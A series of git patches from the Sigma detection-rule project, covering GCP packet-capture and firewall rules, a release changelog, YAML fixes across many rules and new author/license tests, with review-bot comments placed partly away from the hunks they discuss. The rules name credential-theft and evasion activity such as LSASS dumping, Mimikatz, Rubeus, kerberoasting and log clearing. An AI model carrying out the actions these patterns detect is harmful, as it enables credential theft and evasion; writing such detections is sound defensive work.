+ - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html
+logsource:
+ service: gcp.audit
+detection:
+ selection:
+ gcp.audit.method_name:
+ - v*.Compute.PacketMirrorings.Get
+ - v*.Compute.PacketMirrorings.Delete
+ - v*.Compute.PacketMirrorings.Insert
+ - v*.Compute.PacketMirrorings.Patch
+ condition: selection
+level: medium
+tags:
+ - attack.collection
+ - attack.t1074
+falsepositives:
+ - Full Network Packet Capture may be done by a system or network administrator.
+ - If known behavior is causing false positives, it can be exempted from the rule.
From c4b41f8d66f31e81879c8bd1acfc4c092f094f01 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Fri, 13 Aug 2021 17:07:48 -0500
Subject: [PATCH 0331/1367] Update gcp_full_network_traffic_packet_capture.yml
---
 rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml
index 3d6bbd22..321addd3 100644
--- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml
+++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml
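Review bot: `attack.t1074` is Data Staged; configuring packet mirroring is Network Sniffing, whose technique id is T1040, so the tag line should be `- attack.t1040` (the `attack.collection` tactic tag still fits). The method names are capitalized here (`v*.Compute.PacketMirrorings.Insert`) while the firewall rule added in the same series uses lowercase `v*.compute.firewalls.delete`; GCP audit `methodName` values are, as far as I know, lowercase-dotted with a camelCase resource (`v1.compute.packetMirrorings.insert`), so on a case-sensitive backend this selection may never match — worth verifying against a real audit event before the rule leaves `experimental`. Including `PacketMirrorings.Get` also fires on a plain read of the mirroring configuration (console views, IaC plan runs), which is not capture being enabled; consider dropping `Get` or splitting it into a lower-severity rule.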
@@ -1,6 +1,6 @@ title: Google Full Network Traffic Packet Capture id: 980a7598-1e7f-4962-9372-2d754c930d0e -description: Identifies potential full network packet capture in AWS. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. +description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. author: Austin Songer status: experimental date: 2021/08/13 From 6ee9fc9bd68ec9fed498015e8576d352ecb2461e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 17:08:58 -0500 Subject: [PATCH 0332/1367] Update gcp_firewall_rule_modified_or_deleted.yml --- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index 5d4099fb..0ab30c2a 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -18,7 +18,7 @@ detection: condition: selection level: medium tags: - - attack.defense.evasion + - attack.defense_evasion - attack.t1562 falsepositives: - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected. From 5c4fd3a1229a9f30ae05d5eaf8446eee06cdb063 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Sat, 14 Aug 2021 00:25:12 +0200 Subject: [PATCH 0333/1367] Release 0.20 --- CHANGELOG.md | 36 ++++++++++++++++++++++++++++++++++++ tools/setup.py | 9 ++++----- 2 files changed, 40 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 22c20035..ece949b9 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
@@ -6,6 +6,42 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html) from version 0.14.0. +## 0.20 - 2021-08-14 + +### Added + +* Devo backend +* Fields selection added to SQL backend +* Linux/MacOS support for MDATP backend +* Output results as generic YAML/JSON +* Hash normalization option (hash_normalize) for Elasticsearch wildcard handling +* ALA AWS Cloudtrail and Azure mappings +* Logrhytm backend +* Splunk Data Models backend +* Further log sources used in open source Sigma ruleset +* CarbonBlack EDR backend +* Elastic EQL backend +* Additional conversion selection filters +* Filter negation +* Specifiy table in SQL backend +* Generic registry event log source +* Chronicle backend + +### Changed + +* Elastic Watcher backend populates name attribute instead of title. +* One item list optimization. +* Updated Winlogbeat mapping +* Generic mapping for Powershell backend + +### Fixed + +* Elastalert multi output file +* Fixed duplicate output in ElastAlert backend +* Escaping in Graylog backend +* es-rule ndjson output +* Various fixes of known bugs + ## 0.19.1 - 2021-02-28 ### Changed diff --git a/tools/setup.py b/tools/setup.py index 5793f455..239d18be 100644 --- a/tools/setup.py +++ b/tools/setup.py @@ -14,7 +14,7 @@ with open(path.join(here, 'LONG_DESCRIPTION.md'), encoding='utf-8') as f: setup( name='sigmatools', - version='0.19.1', + version='0.20', description='Tools for the Generic Signature Format for SIEM Systems', long_description=long_description, long_description_content_type="text/markdown", 
@@ -30,9 +30,8 @@ setup( 'Topic :: Security', 'Topic :: Internet :: Log Analysis', 'License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)', - 'Programming Language :: Python :: 3.6', - 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', + 'Programming Language :: Python :: 3.9', 'Environment :: Console', ], keywords='security monitoring siem logging signatures elasticsearch splunk ids sysmon', @@ -43,8 +42,8 @@ setup( 'sigma.parser', 'sigma.parser.modifiers', ], - python_requires='~=3.6', - install_requires=['PyYAML', 'pymisp', 'progressbar2'], + python_requires='~=3.8', + install_requires=['PyYAML', 'pymisp', 'progressbar2', 'ruamel.yaml'], extras_require={ 'test': ['coverage', 'yamllint'], }, From e45557316eb3b9769cadd43296af983e61def843 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 14 Aug 2021 09:54:27 +0200 Subject: [PATCH 0334/1367] Fix selection with only 1 element --- rules/linux/lnx_process_discovery.yml | 3 +- rules/linux/macos_clear_system_logs.yml | 3 +- .../win_invoke_obfuscation_clip+_services.yml | 4 +-- ...n_register_new_logon_process_by_rubeus.yml | 5 +-- .../windows/builtin/win_susp_rc4_kerberos.yml | 3 +- ...ileged_service_lsaregisterlogonprocess.yml | 7 ++-- .../sysmon_non_priv_program_files_move.yml | 3 +- .../file_event/sysmon_pcre_net_temp_file.yml | 6 ++-- .../image_load/sysmon_pcre_net_load.yml | 6 ++-- .../win_sdbinst_shim_persistence.yml | 10 +++--- .../process_creation/win_service_stop.yml | 4 +-- .../process_creation/win_susp_atbroker.yml | 12 +++---- ...w_disk_access_using_illegitimate_tools.yml | 3 +- ...smon_registry_persistence_search_order.yml | 16 ++++----- tests/test_rules.py | 33 ++++++++++--------- 15 files changed, 62 insertions(+), 56 deletions(-) diff --git a/rules/linux/lnx_process_discovery.yml b/rules/linux/lnx_process_discovery.yml index 1785e7ef..3dd32ec7 100644 --- a/rules/linux/lnx_process_discovery.yml +++ b/rules/linux/lnx_process_discovery.yml 
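Review bot: The classifier change and `python_requires='~=3.8'` drop Python 3.6 and 3.7 support, and `install_requires` gains `ruamel.yaml`, but neither appears in the 0.20 CHANGELOG entry in the hunk above; a `### Removed` line for the two interpreter versions and an entry for the new runtime dependency would spare downstream packagers a surprise. `ruamel.yaml` is added without a version bound, which matches the other entries, though a lower bound would record which API the code that imports it relies on — that code is not in this patch, so I cannot say which version that is.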
@@ -4,6 +4,7 @@ status: stable description: Detects process discovery commands author: Ömer Günal, oscd.community date: 2020/10/06 +modified: 2021/08/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md logsource: @@ -11,7 +12,7 @@ logsource: category: process_creation detection: selection: - - Image|endswith: + Image|endswith: - '/ps' - '/top' condition: selection diff --git a/rules/linux/macos_clear_system_logs.yml b/rules/linux/macos_clear_system_logs.yml index 33ce525a..4df61165 100644 --- a/rules/linux/macos_clear_system_logs.yml +++ b/rules/linux/macos_clear_system_logs.yml @@ -4,6 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 +modified: 2021/08/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md logsource: @@ -11,7 +12,7 @@ logsource: category: process_creation detection: selection1: - - Image|endswith: '/rm' + Image|endswith: '/rm' selection2: CommandLine|contains: '/var/log' selection3: diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml index b33bf0cb..0b502851 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2020/05/27 +modified: 2021/08/14 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: 
@@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml b/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml index 323fe260..9f5b2215 100644 --- a/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml +++ b/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml @@ -11,13 +11,14 @@ tags: - attack.t1558.003 author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community date: 2019/10/24 +modified: 2021/08/14 logsource: product: windows service: security detection: selection: - - EventID: 4611 - LogonProcessName: 'User32LogonProcesss' + EventID: 4611 + LogonProcessName: 'User32LogonProcesss' condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_rc4_kerberos.yml b/rules/windows/builtin/win_susp_rc4_kerberos.yml index 496ed152..91d3b5b1 100644 --- a/rules/windows/builtin/win_susp_rc4_kerberos.yml +++ b/rules/windows/builtin/win_susp_rc4_kerberos.yml @@ -11,6 +11,7 @@ tags: description: Detects service ticket requests using RC4 encryption type author: Florian Roth date: 2017/02/06 +modified: 2021/08/14 logsource: product: windows service: security @@ -20,7 +21,7 @@ detection: TicketOptions: '0x40810000' TicketEncryptionType: '0x17' reduction: - - ServiceName|startswith: '$' + ServiceName|startswith: '$' condition: selection and not reduction falsepositives: - Service accounts used on legacy systems (e.g. NetApp) diff --git a/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml b/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml index f8d3b458..51ad7f78 100644 
--- a/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml +++ b/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml @@ -11,14 +11,15 @@ tags: - attack.t1558.003 author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community date: 2019/10/24 +modified: 2021/08/14 logsource: product: windows service: security detection: selection: - - EventID: 4673 - Service: 'LsaRegisterLogonProcess()' - Keywords: '0x8010000000000000' #failure + EventID: 4673 + Service: 'LsaRegisterLogonProcess()' + Keywords: '0x8010000000000000' #failure condition: selection falsepositives: - Unknown diff --git a/rules/windows/file_event/sysmon_non_priv_program_files_move.yml b/rules/windows/file_event/sysmon_non_priv_program_files_move.yml index b7440b4b..1a5025a1 100644 --- a/rules/windows/file_event/sysmon_non_priv_program_files_move.yml +++ b/rules/windows/file_event/sysmon_non_priv_program_files_move.yml @@ -4,6 +4,7 @@ description: Search for dropping of files to Windows/Program Files fodlers by no status: experimental author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community date: 2020/10/17 +modified: 2021/08/14 references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg tags: @@ -18,7 +19,7 @@ detection: integrity: IntegrityLevel: 'Medium' program_files: - - TargetFilename|contains: + TargetFilename|contains: - '\Program Files\' - '\Program Files (x86)\' windows: diff --git a/rules/windows/file_event/sysmon_pcre_net_temp_file.yml b/rules/windows/file_event/sysmon_pcre_net_temp_file.yml index f45d3e39..f4668f6c 100644 --- a/rules/windows/file_event/sysmon_pcre_net_temp_file.yml +++ b/rules/windows/file_event/sysmon_pcre_net_temp_file.yml 
@@ -3,7 +3,7 @@ id: 6e90ae7a-7cd3-473f-a035-4ebb72d961da description: Detects processes creating temp files related to PCRE.NET package status: experimental date: 2020/10/29 -modified: 2021/05/21 +modified: 2021/08/14 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -16,8 +16,8 @@ logsource: product: windows detection: selection: - - TargetFilename|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ + TargetFilename|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/image_load/sysmon_pcre_net_load.yml b/rules/windows/image_load/sysmon_pcre_net_load.yml index 383a83b9..3debcfa6 100644 --- a/rules/windows/image_load/sysmon_pcre_net_load.yml +++ b/rules/windows/image_load/sysmon_pcre_net_load.yml @@ -3,7 +3,7 @@ id: 84b0a8f3-680b-4096-a45b-e9a89221727c description: Detects processes loading modules related to PCRE.NET package status: experimental date: 2020/10/29 -modified: 2021/05/21 +modified: 2021/08/14 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -16,8 +16,8 @@ logsource: product: windows detection: selection: - - ImageLoaded|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ + ImageLoaded|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/win_sdbinst_shim_persistence.yml b/rules/windows/process_creation/win_sdbinst_shim_persistence.yml index 66b93984..c688f5fa 100644 --- a/rules/windows/process_creation/win_sdbinst_shim_persistence.yml +++ b/rules/windows/process_creation/win_sdbinst_shim_persistence.yml 
@@ -11,18 +11,16 @@ tags: - attack.t1138 # an old one author: Markus Neis date: 2019/01/16 -modified: 2021/04/01 +modified: 2021/08/14 logsource: category: process_creation product: windows detection: selection: - Image|endswith: - - '\sdbinst.exe' - CommandLine|contains: - - '.sdb' + Image|endswith: '\sdbinst.exe' + CommandLine|contains: '.sdb' filter: - - CommandLine|contains: + CommandLine|contains: - 'iisexpressshim.sdb' # normal behaviour for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120) condition: selection and not filter falsepositives: diff --git a/rules/windows/process_creation/win_service_stop.yml b/rules/windows/process_creation/win_service_stop.yml index f77e0b64..6cc71eb1 100644 --- a/rules/windows/process_creation/win_service_stop.yml +++ b/rules/windows/process_creation/win_service_stop.yml @@ -4,7 +4,7 @@ description: Detects a windows service to be stopped status: experimental author: Jakob Weinzettl, oscd.community date: 2019/10/23 -modified: 2019/11/08 +modified: 2021/08/14 tags: - attack.impact - attack.t1489 @@ -13,7 +13,7 @@ logsource: product: windows detection: selection: - - Image|endswith: + Image|endswith: - '\sc.exe' - '\net.exe' - '\net1.exe' diff --git a/rules/windows/process_creation/win_susp_atbroker.yml b/rules/windows/process_creation/win_susp_atbroker.yml index ac9584df..b8e182c8 100644 --- a/rules/windows/process_creation/win_susp_atbroker.yml +++ b/rules/windows/process_creation/win_susp_atbroker.yml @@ -7,6 +7,7 @@ references: status: experimental author: Mateusz Wydra, oscd.community date: 2020/10/12 +modified: 2021/08/14 tags: - attack.defense_evasion - attack.t1218 
@@ -14,12 +15,11 @@ logsource: category: process_creation product: windows detection: - selection1: - - Image|endswith: 'AtBroker.exe' - selection2: - - CommandLine|contains: 'start' + selection: + Image|endswith: 'AtBroker.exe' + CommandLine|contains: 'start' filter: - - CommandLine|contains: + CommandLine|contains: - animations - audiodescription - caretbrowsing @@ -47,7 +47,7 @@ detection: - windowtracking - windowtrackingtimeout - windowtrackingzorder - condition: selection1 and selection2 and not filter + condition: selection and not filter falsepositives: - Legitimate, non-default assistive technology applications execution level: high diff --git a/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml b/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml index 72fbafb6..abb7d2c7 100644 --- a/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml +++ b/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml @@ -3,6 +3,7 @@ id: db809f10-56ce-4420-8c86-d6a7d793c79c description: Raw disk access using illegitimate tools, possible defence evasion author: Teymur Kheirkhabarov, oscd.community date: 2019/10/22 +modified: 2021/08/14 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: @@ -15,7 +16,7 @@ detection: filter_1: Device|contains: floppy filter_2: - - Image|endswith: # easy to bypass. requires extra rule to support this one + Image|endswith: # easy to bypass. requires extra rule to support this one - '\wmiprvse.exe' - '\sdiagnhost.exe' - '\searchindexer.exe' diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index 7f4b07fc..0b5fd732 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml 
+++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml @@ -6,7 +6,7 @@ references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2021/05/01 +modified: 2021/08/14 tags: - attack.persistence - attack.t1038 # an old one @@ -21,24 +21,24 @@ detection: - '_Classes\CLSID\' - '\InProcServer32\(Default)' filter1: - - Details|contains: # Exclude privileged directories and observed FPs + Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' - '%%systemroot%%\SysWow64\' filterOneDrive: - - Details|contains: '\AppData\Local\Microsoft\OneDrive\' + Details|contains: '\AppData\Local\Microsoft\OneDrive\' filterOneDrive2: - - Details|contains: + Details|contains: - '\FileCoAuthLib64.dll' - '\FileSyncShell64.dll' - '\FileSyncApi64.dll' filter2: - - Details|contains|all: + Details|contains|all: - '\AppData\Local\Microsoft\TeamsMeetingAddin\' - '\Microsoft.Teams.AddinLoader.dll' filter3: - - Details|contains|all: - - '\AppData\Roaming\Dropbox\' - - '\DropboxExt64.*.dll' + Details|contains|all: + - '\AppData\Roaming\Dropbox\' + - '\DropboxExt64.*.dll' condition: selection and not ( filter1 or ( filterOneDrive and filterOneDrive2 ) or filter2 or filter3 ) falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/tests/test_rules.py b/tests/test_rules.py index cc53d85b..0efb2218 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -553,28 +553,29 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source") - #deactivate because more than 170 rules have been corrected - # def test_selection_list_one_value(self): - # faulty_rules = [] - # for file in self.yield_next_rule_file_path(self.path_to_rules): - # detection = self.get_rule_part(file_path=file, part_name="detection") - # if detection: - # valid = True - # for key in detection: - # if isinstance(detection[key],list): - # if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term - # print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) - # #valid = False + + def test_selection_list_one_value(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + detection = self.get_rule_part(file_path=file, part_name="detection") + if detection: + valid = True + for key in detection: + if isinstance(detection[key],list): + if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term + print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 element in detection".format(file, key)) + valid = False + #deactivate because more than 170 rules have to be corrected # if isinstance(detection[key],dict): # for sub_key in detection[key]: # if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" # if len(detection[key][sub_key]) == 1: # print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) # #valid = False - # if not valid: - # faulty_rules.append(file) - # - # self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") + if not valid: + 
faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 element") def get_mitre_data(): """ From db0de126a556a3adf5c1906483218438a8eee2be Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 14 Aug 2021 19:16:36 +0200 Subject: [PATCH 0335/1367] test author for Detection Rule License 1.1 --- rules/network/zeek/zeek_susp_kerberos_rc4.yml | 1 + rules/windows/builtin/win_susp_lsass_dump.yml | 1 + .../image_load/sysmon_mimikatz_inmemory_detection.yml | 1 + tests/test_rules.py | 8 ++++++-- 4 files changed, 9 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_susp_kerberos_rc4.yml b/rules/network/zeek/zeek_susp_kerberos_rc4.yml index c5b85768..23867c4e 100644 --- a/rules/network/zeek/zeek_susp_kerberos_rc4.yml +++ b/rules/network/zeek/zeek_susp_kerberos_rc4.yml @@ -1,6 +1,7 @@ title: Kerberos Network Traffic RC4 Ticket Encryption id: 503fe26e-b5f2-4944-a126-eab405cc06e5 status: experimental +author: sigma date: 2020/02/12 description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting references: diff --git a/rules/windows/builtin/win_susp_lsass_dump.yml b/rules/windows/builtin/win_susp_lsass_dump.yml index fef8980b..8da6d370 100644 --- a/rules/windows/builtin/win_susp_lsass_dump.yml +++ b/rules/windows/builtin/win_susp_lsass_dump.yml @@ -2,6 +2,7 @@ title: Password Dumper Activity on LSASS id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN status: experimental +author: sigma date: 2017/02/12 modified: 2021/06/21 references: diff --git a/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml b/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml index d2158436..db4a867f 100755 --- a/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml +++ b/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml 
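Review bot: `valid` is bound only inside the `if detection:` branch; indentation is lost in this rendering, so if `if not valid:` sits at the same level as `if detection:` a rule file with no detection part raises UnboundLocalError instead of being skipped — initialising `valid = True` before `if detection:`, or moving the `if not valid:` check into the branch, removes the ambiguity. The re-enabled check covers only top-level `detection[key]` lists, which is exactly the shape the rule edits in this commit fix, while the per-field sub-key variant stays commented out; a short docstring such as `"""A detection selection must not be a one-element list of maps (use the map directly)."""` would tell the next reader what the test enforces and why single-string keyword lists are exempt. `test_selection_list_one_value` is complete within the hunk; the enclosing `TestRules` class continues outside it.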
@@ -1,6 +1,7 @@ title: Mimikatz In-Memory id: c0478ead-5336-46c2-bd5e-b4c84bc3a36e status: experimental +author: sigma description: Detects certain DLL loads when Mimikatz gets executed references: - https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/ diff --git a/tests/test_rules.py b/tests/test_rules.py index 0efb2218..4cff6e75 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -397,7 +397,8 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") - def test_optional_author(self): + # Upgrade Detection Rule License 1.1 + def test_author(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): author_str = self.get_rule_part(file_path=file, part_name="author") @@ -406,9 +407,12 @@ class TestRules(unittest.TestCase): if not isinstance(author_str, str): print(Fore.YELLOW + "Rule {} has a 'author' field that isn't a string.".format(file)) faulty_rules.append(file) + else: + print(Fore.YELLOW + "Rule {} has no 'author' field".format(file)) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed optional 'author' fields. (has to be a string even if it contains many author)") + "There are rules with malformed 'author' fields. (has to be a string even if it contains many author)") def test_optional_tlp(self): faulty_rules = [] From 3900ba9e2cc9586a0537e5c194275d3fe08495cb Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 14 Aug 2021 19:42:29 +0200 Subject: [PATCH 0336/1367] add license test --- tests/test_rules.py | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 4cff6e75..e3fac59b 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
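Review bot: The added `else:` branch reports "has no 'author' field", but with indentation lost here it is not visible whether it pairs with the outer `if author_str:` (above the hunk) or with `if not isinstance(author_str, str):`; in the latter case every rule with a valid string author would be reported as missing one, so the indentation is worth confirming in the real file. The rename from `test_optional_author` to `test_author` changes the contract from optional to mandatory; a docstring such as `"""Every rule must carry a string 'author' field (Detection Rule License 1.1)."""` would make that intent explicit instead of leaving it to the one-line comment. The three rules patched in this commit satisfy the new test with the placeholder `author: sigma`, which meets the check but not the attribution purpose the commit subject suggests it serves.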
@@ -414,6 +414,18 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'author' fields. (has to be a string even if it contains many author)") + def test_optional_license(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + license_str = self.get_rule_part(file_path=file, part_name="license") + if license_str: + if not isinstance(license_str, str): + print(Fore.YELLOW + "Rule {} has a malformed 'license' (has to be a string).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'license' fields. (has to be a string )") + def test_optional_tlp(self): faulty_rules = [] valid_tlp = [ From 885bbefe732456963afcec9a56e598d391fd9ff1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 16:21:16 -0500 Subject: [PATCH 0337/1367] Update gcp_full_network_traffic_packet_capture.yml --- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 321addd3..6b63093e 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -16,6 +16,7 @@ detection: - v*.Compute.PacketMirrorings.Delete - v*.Compute.PacketMirrorings.Insert - v*.Compute.PacketMirrorings.Patch + - v*.Compute.PacketMirrorings.List condition: selection level: medium tags: From d407a3dd4f324e4f08a2d29e4455a0856c27b271 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 16:24:50 -0500 Subject: [PATCH 0338/1367] Update gcp_firewall_rule_modified_or_deleted.yml --- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) 
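Review bot: `if license_str:` lets a present-but-empty `license: ''` through unreported, and the final message has a stray space before the closing parenthesis: `"There are rules with malformed 'license' fields. (has to be a string)"`. Testing `if license_str is not None:` would report the empty value as malformed as well, assuming `get_rule_part` returns `None` for an absent key, which is not visible in this hunk. A one-line docstring, e.g. `"""The optional 'license' field, when present, must be a plain string."""`, would match the purpose of the neighbouring tests.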
diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index 0ab30c2a..da19b154 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -12,9 +12,10 @@ logsource: detection: selection: gcp.audit.method_name: - - v*.compute.firewalls.delete - - v*.compute.firewalls.patch - - v*.compute.firewalls.update + - v*.Compute.Firewalls.Delete + - v*.Compute.Firewalls.Patch + - v*.Compute.Firewalls.Update + - v*.Compute.Firewalls.Insert condition: selection level: medium tags: From 872c54bc0c68d2ee620f3b8a4c9654d16159954f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 16:50:11 -0500 Subject: [PATCH 0339/1367] Update gcp_full_network_traffic_packet_capture.yml --- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 6b63093e..3c4b43c1 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -17,6 +17,7 @@ detection: - v*.Compute.PacketMirrorings.Insert - v*.Compute.PacketMirrorings.Patch - v*.Compute.PacketMirrorings.List + - v*.Compute.PacketMirrorings.aggregatedList condition: selection level: medium tags: From 980954751eaac171875c099e2b991c90f65a0856 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 21:53:56 